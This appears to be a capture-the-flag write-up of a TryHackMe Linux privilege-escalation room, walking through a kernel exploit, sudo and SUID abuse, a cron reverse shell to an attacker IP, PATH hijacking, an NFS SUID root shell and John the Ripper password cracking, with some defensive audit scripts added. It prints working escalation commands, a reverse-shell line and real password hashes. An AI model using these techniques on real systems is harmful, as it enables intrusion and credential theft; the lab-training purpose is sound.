https://tryhackme.com/room/linprivesc
Enumeration
Commands that can be used to collect information about a Linux system.
Hostname
```console
karen@wade7363:/$ hostname
wade****
```
Linux kernel version
```console
karen@wade7363:/$ uname -a
Linux wade7363 3.**.*-**-******* #46-Ubuntu
GNU/Linux
```
```console
karen@wade7363:/$ cat /proc/version
Linux version 3.**.*-**-******* (buildd@panlong)
-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
```
Linux distro version
```console
karen@wade7363:/$ cat /etc/os-release
NAME="Ubuntu"
VERSION="**.**, ****** ****"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu **.** LTS"
VERSION_ID="**.**"
```
Python version
```console
karen@wade7363:/$ python --version
Python *.*.*
```
Find a vulnerability
```console
$ searchsploit linux kernel 3.13.0-24 --cve --exclude="(PoC)|/dos/"
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
$ searchsploit -p 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /opt/homebrew/opt/exploitdb/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-****-****
```
Kernel Exploits
This task involves using a kernel exploit to read a flag.
Use a kernel exploit
```console
┌──(user㉿host1)-[~/Downloads]
└─$ sudo python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.69.129 - - [05/Jul/2023 17:44:26] "GET /37292.c HTTP/1.1" 200 -
```
```console
karen@wade7363:/tmp$ wget 10.2.53.143:8000/37292.c
--2023-07-05 20:44:26-- http://10.2.53.143:8000/37292.c
Connecting to 10.2.53.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
Saving to: ‘37292.c’
100%[=========================================================================>] 5,119 --.-K/s in 0s
2023-07-05 20:44:26 (514 MB/s) - ‘37292.c’ saved [5119/5119]
```
```console
karen@wade7363:/tmp$ gcc -o ofs 37292.c
karen@wade7363:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# bash
root@wade7363:/tmp#
```
Find flag
```console
root@wade7363:/tmp# find / -name flag*txt
/home/matt/flag1.txt
root@wade7363:/tmp# cat /home/matt/flag1.txt
THM-**************
```
Sudo
Use sudo -l to check the current user's sudo permissions. Refer to https://gtfobins.github.io/ for ways to escalate privileges when the current user has sudo rights to a particular application. This task involves abusing the current user's sudo rights to escalate privileges and read a flag.
Check sudo permissions
```console
karen@ip-10-10-9-126:/$ sudo -l
Matching Defaults entries for karen on ip-10-10-9-126:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karen may run the following commands on ip-10-10-9-126:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
```
Find flag
```console
karen@ip-10-10-9-126:/$ find / -name "flag2.txt" 2>/dev/null
/home/ubuntu/flag2.txt
karen@ip-10-10-9-126:/$ cat /home/ubuntu/flag2.txt
THM-*********
```
Read password hash using less
```console
karen@ip-10-10-9-126:/$ sudo less -F /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
```
```console
karen@ip-10-10-9-126:/$ sudo less /etc/profile
[within less: !/bin/sh]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
```
Read password hash using nano
```console
karen@ip-10-10-9-126:/$ sudo nano /etc/shadow
[then copy paste from within nano]
```
```console
sudo nano
[within nano: ctrl+R then ctrl+X then: reset; sh 1>&0 2>&0]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
```
Read password hash using find
```console
karen@ip-10-10-9-126:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
```
SUID
SUID (set-user identification) causes an executable to run with the permissions of the file's owner rather than those of the user who runs it; SGID (set-group identification) does the same for the file's group. If a binary has the SUID bit set, it can potentially be used to read files that are inaccessible to the current user, or to escalate privileges. Refer to https://gtfobins.github.io/ for ways to escalate privileges when the current user can run a binary with the SUID bit set.
This task involves abusing a binary with the SUID bit set to escalate privileges and read a flag.
Find binaries with SUID bit set
```console
karen@ip-10-10-37-191:/$ find / -perm -u=s -type f 2>/dev/null
...
/usr/bin/base64
...
```
Abuse SUID bit to read shadow file
```console
karen@ip-10-10-37-191:/$ base64 /etc/shadow | base64 --decode
...
***********:$6$****************************************************************************************************:18796:0:99999:7:::
...
```
Use unshadow to prepare to crack
```console
┌──(user㉿host1)-[~/Downloads]
└─$ unshadow passwd.txt shadow.txt
...
***********:$6$****************************************************************************************************:1001:1001::/home/***********:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/ho
...
```
Use John the Ripper to crack
```console
┌──(user㉿host1)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (karen)
********* (user2)
test123 (***********)
3g 0:00:00:13 DONE (2023-07-06 00:47) 0.2248g/s 1324p/s 1861c/s 1861C/s paramedic..ellie123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Find and read flag
```console
karen@ip-10-10-52-126:/$ find / -name "flag3.txt" 2>/dev/null
/home/ubuntu/flag3.txt
karen@ip-10-10-52-126:/$ cat /home/ubuntu/flag3.txt
cat: /home/ubuntu/flag3.txt: Permission denied
karen@ip-10-10-52-126:/$ base64 /home/ubuntu/flag3.txt | base64 --decode
THM-*******
```
Capabilities
Capabilities give sysadmins a way to grant privileges more granularly than a full SUID bit. Use getcap -r / 2>/dev/null to list binaries that have capabilities set. Refer to https://gtfobins.github.io/ for ways to escalate privileges when a binary the current user can run has a capability set.
Use getcap to list enabled capabilities
```console
karen@ip-10-10-184-172:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
```
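Triaging a getcap listing by hand is error-prone, so here is an added example (not part of the room or this writeup) that parses the output above and flags binaries whose permitted/effective set includes a capability that lets a process become root or bypass file permissions. The RISKY_CAPS list and the SYSTEM_PREFIXES used to decide whether a binary lives somewhere a package manager would put it are assumptions for this audit, and the sample input is the page's listing embedded as a string.

```python
import re

# Capabilities that let a process become root or bypass file permissions (assumed list).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown"}
# Where a distribution-packaged binary is expected to live (assumption used for triage).
SYSTEM_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")

# Constructed sample: the getcap -r / listing shown on the page.
SAMPLE_GETCAP = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
"""

def parse_caps(capstr):
    """'cap_a,cap_b+ep' (older libcap) or 'cap_a,cap_b=ep' (newer libcap) -> ({cap_a, cap_b}, 'ep')."""
    m = re.fullmatch(r"([\w,]+)[+=]([eip]*)", capstr)
    if not m:
        raise ValueError(f"unrecognised capability string: {capstr!r}")
    return set(m.group(1).split(",")), m.group(2)

def parse_getcap(text):
    """Return [(path, caps, flags)] for every line of getcap -r output, in either output format."""
    entries = []
    for line in (ln.strip() for ln in text.splitlines()):
        if not line:
            continue
        path, _, capstr = line.partition(" = ") if " = " in line else line.rpartition(" ")
        caps, flags = parse_caps(capstr)
        entries.append((path, caps, flags))
    return entries

def find_risky(text):
    """Binaries whose permitted or effective set holds a risky capability, noting odd locations."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        risky = caps & RISKY_CAPS
        if risky and ("e" in flags or "p" in flags):
            findings.append({"path": path, "caps": sorted(risky),
                             "outside_system_dirs": not path.startswith(SYSTEM_PREFIXES)})
    return findings

if __name__ == "__main__":
    for f in find_risky(SAMPLE_GETCAP):
        where = "OUTSIDE system dirs" if f["outside_system_dirs"] else "system dir"
        print(f"{f['path']}: {','.join(f['caps'])} ({where})")
```

On the page's listing only the two cap_setuid copies of vim in home directories are reported; ping and friends carry cap_net_raw, which is not in the risky set.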
Abuse cap_setuid to gain root
```console
karen@ip-10-10-184-172:~$ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
# bash
root@ip-10-10-184-172:~# find / -name "flag4.txt"
/home/ubuntu/flag4.txt
root@ip-10-10-184-172:~# cat /home/ubuntu/flag4.txt
THM-*******
```
Cron Jobs
Cron jobs run with the privileges of their owner. If a scheduled task runs as root and we can change the script it executes, that script will run with root privileges. System-wide cron jobs are listed in /etc/crontab (cat /etc/crontab).
Find cronjob owned by root
```console
karen@ip-10-10-6-10:~$ cat /etc/crontab
...
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /antivirus.sh
* * * * * root antivirus.sh
* * * * * root /home/karen/backup.sh
* * * * * root /tmp/test.py
...
```
Find cronjob writable by current user
```console
karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
cd /home/admin/1/2/3/Results
zip -r /home/admin/download.zip ./*
```
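The two steps above (list root jobs, then check who can write the script they run) can be automated as a defender's audit. The following is an added example, not part of the room or this writeup: it parses the job lines from the page's /etc/crontab, resolves relative programs along cron's PATH the way cron's shell would, and reports every root job whose target is missing, not root-owned, or writable by others. The PATH line in the sample is assumed, and FAKE_FS is a constructed stand-in for os.stat() so the audit runs offline; pass os.stat (the default) on a real host.

```python
import os, re, stat
from types import SimpleNamespace
# Constructed excerpt in the layout of the page's /etc/crontab (the PATH line is assumed).
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /antivirus.sh
* * * * * root antivirus.sh
* * * * * root /home/karen/backup.sh
* * * * * root /tmp/test.py
"""
# Constructed stand-in for os.stat() so the audit runs offline; pass FAKE_FS.__getitem__ as stat_fn.
FAKE_FS = {"/bin/run-parts": SimpleNamespace(st_uid=0, st_mode=0o100755),
           "/home/karen/backup.sh": SimpleNamespace(st_uid=1001, st_mode=0o100755),
           "/tmp/test.py": SimpleNamespace(st_uid=0, st_mode=0o100777)}

def parse_system_crontab(text):
    """Yield (user, command, PATH) per job line of a 7-field system crontab."""
    path_env = "/usr/bin:/bin"                      # cron's default when the file sets none
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("PATH="):
            path_env = line[5:].strip('"')
        elif line and not line.startswith("#") and not re.match(r"^\w+=", line):
            fields = line.split(None, 6)
            if len(fields) == 7:
                yield fields[5], fields[6], path_env

def locate(prog, path_env, stat_fn):
    # Absolute programs are used as given; relative ones are searched along cron's PATH.
    cands = [prog] if prog.startswith("/") else [os.path.join(d, prog) for d in path_env.split(":")]
    for cand in cands:
        try:
            return cand, stat_fn(cand)
        except (OSError, KeyError):                 # KeyError only from the dict stand-in
            pass
    return prog, None

def audit_root_jobs(text, stat_fn=os.stat):
    """Return [(target, reason)] for root jobs whose program a non-root user could replace."""
    findings = []
    for user, cmd, path_env in parse_system_crontab(text):
        if user != "root":
            continue
        # first word of each simple command in the job's shell list or pipeline
        for prog in [s.split()[0] for s in re.split(r"&&|\|\||;|\|", cmd) if s.split()]:
            if prog in ("cd", "test"):              # shell builtins, nothing on disk to replace
                continue
            target, st = locate(prog, path_env, stat_fn)
            if st is None:
                findings.append((target, "missing: whoever can create it runs code as root"))
            elif st.st_uid != 0:
                findings.append((target, f"owned by uid {st.st_uid}, not root"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((target, "writable by group or others"))
    return findings
```

Against the sample the standard run-parts job resolves to a clean /bin/run-parts and is silent, while the four custom jobs are each reported for a different reason.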
Modify job file with reverse shell
```console
karen@ip-10-10-6-10:~$ find / -name "flag5.txt" 2>/dev/null
/home/ubuntu/flag5.txt
karen@ip-10-10-6-10:~$ cat /home/ubuntu/flag5.txt
cat: /home/ubuntu/flag5.txt: Permission denied
karen@ip-10-10-6-10:~$ vi /home/karen/backup.sh
karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.2.53.143/6666 0>&1
karen@ip-10-10-6-10:~$ chmod 777 /home/karen/backup.sh
```
Listen for reverse shell
```console
┌──(user㉿host1)-[~/Downloads]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.2.53.143] from (UNKNOWN) [10.10.6.10] 55212
bash: cannot set terminal process group (13073): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-6-10:~# cat /home/ubuntu/flag5.txt
cat /home/ubuntu/flag5.txt
THM-*********
```
Use John the Ripper to crack
```console
cat /etc/shadow
...
matt:$6$*****************************************************************************************:18798:0:99999:7:::
┌──(user㉿host1)-[~/Downloads]
└─$ vi matt
┌──(user㉿host1)-[~/Downloads]
└─$ cat matt
matt:$6$*****************************************************************************************:18798:0:99999:7:::
┌──(user㉿host1)-[~/Downloads]
└─$ john matt
...
Proceeding with wordlist:/usr/share/john/password.lst
****** (matt)
...
```
PATH
PATH is an environmental variable that tells the operating system where to search for executables when they are not built into the shell or defined with an absolute path.
View the PATH
```console
karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```
Find writable folders
```console
karen@ip-10-10-53-18:/$ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
...
home/*******
...
tmp
...
```
Find the flag
```console
karen@ip-10-10-53-18:/$ find / -name "flag6.txt" 2>/dev/null
/home/matt/flag6.txt
karen@ip-10-10-53-18:/$ cat /home/matt/flag6.txt
cat: /home/matt/flag6.txt: Permission denied
```
Explore writable folder
```console
karen@ip-10-10-53-18:/tmp$ ls -l /home/*******/
total 24
-rwsr-xr-x 1 root root 16712 Jun 20 2021 test
-rw-rw-r-- 1 root root 86 Jun 20 2021 thm.py
karen@ip-10-10-53-18:/tmp$ cat /home/murdoch/thm.py
#!/usr/bin/python3
import os
import sys
try:
    os.system("thm")
except:
    sys.exit()
```
Abuse PATH to run attack
```console
karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
export PATH=/tmp:$PATH
karen@ip-10-10-53-18:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
karen@ip-10-10-53-18:/tmp$ vi /tmp/thm
karen@ip-10-10-53-18:/tmp$ cat /tmp/thm
cat /home/matt/flag6.txt
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$ /home/murdoch/test
THM-736628929
```
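The root cause in this task is a privileged program that calls a bare command name (os.system("thm")) and so inherits whatever PATH the caller sets. As an added example, not part of the room or this writeup, the code below shows both sides of the fix: path_entry_problems() audits a PATH string for entries another user could plant a lookalike in, and trusted_lookup() is how a privileged program should resolve a helper instead, searching only a fixed trusted PATH and refusing any directory or file that is not owned by the expected uid and locked against group/other writes. demo() builds a constructed throwaway layout that mirrors the page's trick (a world-writable directory prepended to PATH) and is not the target's filesystem.

```python
import os, shutil, stat, tempfile

def path_entry_problems(path_env, euid=None):
    """[(entry, reason)] for PATH entries where another user could plant a lookalike program."""
    euid = os.geteuid() if euid is None else euid
    problems = []
    for entry in path_env.split(":"):
        if not os.path.isabs(entry):                       # "" and "." mean the current directory
            problems.append((entry or "(empty)", "relative entry resolves to the current directory"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            problems.append((entry, "missing: whoever can create it controls lookups"))
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append((entry, "writable by group or others"))
        elif st.st_uid not in (0, euid):
            problems.append((entry, f"owned by uid {st.st_uid}, neither root nor the caller"))
    return problems

def _owned_and_locked(path, owner_uid):
    st = os.stat(path)
    return st.st_uid == owner_uid and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)

def trusted_lookup(name, trusted_path="/usr/sbin:/usr/bin:/sbin:/bin", owner_uid=0):
    """Resolve `name` only inside trusted directories; both the directory and the file must be locked."""
    for d in trusted_path.split(":"):
        cand = os.path.join(d, name)
        if os.path.isfile(cand):
            if not (_owned_and_locked(d, owner_uid) and _owned_and_locked(cand, owner_uid)):
                raise PermissionError(f"{cand}: dir or file not owned by uid {owner_uid} and locked")
            return cand
    raise FileNotFoundError(f"{name} not found on trusted PATH")

def demo():
    """Constructed layout mirroring the page: a world-writable dir ahead of a sane one, a 'thm' in each."""
    root = tempfile.mkdtemp()
    hijack, sane = os.path.join(root, "tmp"), os.path.join(root, "bin")
    for d, mode in ((hijack, 0o1777), (sane, 0o755)):
        os.mkdir(d); os.chmod(d, mode)
        with open(os.path.join(d, "thm"), "w") as fh:
            fh.write("#!/bin/sh\necho thm\n")
        os.chmod(os.path.join(d, "thm"), 0o755)
    me = os.geteuid()
    try:
        problems = path_entry_problems(f"{hijack}:{sane}:", euid=me)
        try:
            trusted_lookup("thm", trusted_path=hijack, owner_uid=me)
            rejected = False
        except PermissionError:
            rejected = True
        return problems, trusted_lookup("thm", sane, me) == os.path.join(sane, "thm"), rejected
    finally:
        shutil.rmtree(root)
```

demo() returns the two PATH findings (the world-writable directory and the trailing empty entry), confirms the sane directory resolves, and confirms the lookalike in the world-writable directory is refused even though the file itself is not writable by others.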
NFS
NFS configuration can be found in /etc/exports. If a share is exported with “no_root_squash”, the server does not map a client's root user to “nfsnobody”, so files created on the share by a remote root keep root ownership and their SUID bit. An attacker who is root on their own machine could therefore create an executable with the SUID bit set on the share and run it on the target system.
Check nfs config for no_root_squash
```console
karen@ip-10-10-39-217:/$ cat /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
```
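An added example, not part of the room or this writeup, that parses /etc/exports in the form shown above and reports each export where no_root_squash is set, rating it critical when the share is also rw (a remote root can then drop a root-owned SUID file on it) and noting the "*" wildcard client and the insecure option; harden_line() produces the corrected line. The sample embeds the page's three exports plus a constructed /srv/public line that passes the check.

```python
import re

# Constructed sample: the three exports shown on the page plus one hardened line
# (/srv/public is made up for contrast and is not from the page).
SAMPLE_EXPORTS = """\
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync,root_squash)   # constructed, not from the page
"""

EXPORT_RE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.+)$")
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")

def parse_exports(text):
    """Return [(path, [(host, [option, ...]), ...])]; comments and blank lines are skipped."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            raise ValueError(f"unparseable exports line: {line!r}")
        clients = [(c.group("host"), [o for o in (c.group("opts") or "").split(",") if o])
                   for c in CLIENT_RE.finditer(m.group("clients"))]
        exports.append((m.group("path"), clients))
    return exports

def audit_exports(text):
    """Flag exports where a client's root keeps uid 0 on the server (no_root_squash).
    rw makes it critical: a remote root can then plant a root-owned SUID binary on the share."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if "no_root_squash" not in opts:
                continue
            notes = []
            if host == "*":
                notes.append("exported to every host")
            if "insecure" in opts:
                notes.append("accepts requests from unprivileged source ports")
            findings.append({"path": path, "host": host,
                             "severity": "critical" if "rw" in opts else "medium", "notes": notes})
    return findings

def harden_line(line):
    """Rewrite one exports line so that a client's root is mapped to the anonymous user."""
    return re.sub(r"\bno_root_squash\b", "root_squash", line)
```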
Enumerate mountable shares from attack machine
```console
root@ip-10-10-181-118:~# showmount -e 10.10.39.217
Export list for 10.10.39.217:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *
```
Mount a no_root_squash share
```console
root@ip-10-10-181-118:/tmp/backupsonattackermachine# mkdir /tmp/tmponattackermachine
root@ip-10-10-181-118:/tmp/backupsonattackermachine# mount -o rw 10.10.39.217:/tmp/ /tmp/tmponattackermachine/
root@ip-10-10-181-118:/tmp/backupsonattackermachine# cd /tmp/tmponattackermachine/
```
Compile an exploit
```console
┌──(root㉿kali)-[~]
└─# vi nfs.c
┌──(root㉿kali)-[~]
└─# cat nfs.c
#include <stdlib.h>
#include <unistd.h>
int main()
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
┌──(root㉿kali)-[~]
└─# gcc nfs.c -o nfs -w
┌──(root㉿kali)-[~]
└─# chmod +s nfs
┌──(root㉿kali)-[~]
└─# ls -l
...
-rwsr-sr-x 1 root root 16056 Jan 21 10:18 nfs
...
```
Run exploit using victim
```console
karen@ip-10-10-39-217:/tmp$ ./nfs
root@ip-10-10-39-217:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
root@ip-10-10-39-217:/tmp# whoami
root
root@ip-10-10-39-217:/tmp# find / -name "flag7.txt"
/home/matt/flag7.txt
root@ip-10-10-39-217:/tmp# cat /home/matt/flag7.txt
THM-********
```
Capstone Challenge
Explore target system
```console
[leonard@ip-10-10-167-52 ~]$ uname -a
Linux ip-10-10-167-52 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[leonard@ip-10-10-167-52 ~]$ cat /proc/version
Linux version 3.10.0-1160.el7.x86_64 ([email protected]) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Mon Oct 19 16:18:59 UTC 2020
```
Crack passwords using John the Ripper
```console
[leonard@ip-10-10-167-52 ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash
[leonard@ip-10-10-167-52 ~]$ base64 /etc/shadow | base64 --decode
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
┌──(user㉿host1)-[~/Downloads/12]
└─$ vi password
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat password
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash
┌──(user㉿host1)-[~/Downloads/12]
└─$ vi shadow
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat shadow
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
┌──(user㉿host1)-[~/Downloads/12]
└─$ unshadow password shadow > unshadowed
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat unshadowed
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51:0:0:root:/root:/bin/bash
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:1001:1001::/home/missy:/bin/bash
┌──(user㉿host1)-[~/Downloads/12]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (missy)
```
Read flag1
```console
[missy@ip-10-10-167-52 ~]$ cat /home/missy/Documents/flag1.txt
THM-**************
```
Check user’s privileges
```console
[missy@ip-10-10-167-52 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-167-52:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-167-52:
(ALL) NOPASSWD: /usr/bin/find
```
Escalate privileges
```console
[missy@ip-10-10-167-52 ~]$ sudo find /home -exec /bin/bash \;
[root@ip-10-10-167-52 missy]# whoami
root
```
Read flag2
```console
[root@ip-10-10-167-52 missy]# ls -l /home/rootflag/
total 4
-rw-r--r--. 1 root root 20 Jun 7 2021 flag2.txt
[root@ip-10-10-167-52 missy]# cat /home/rootflag/flag2.txt
THM-***************
```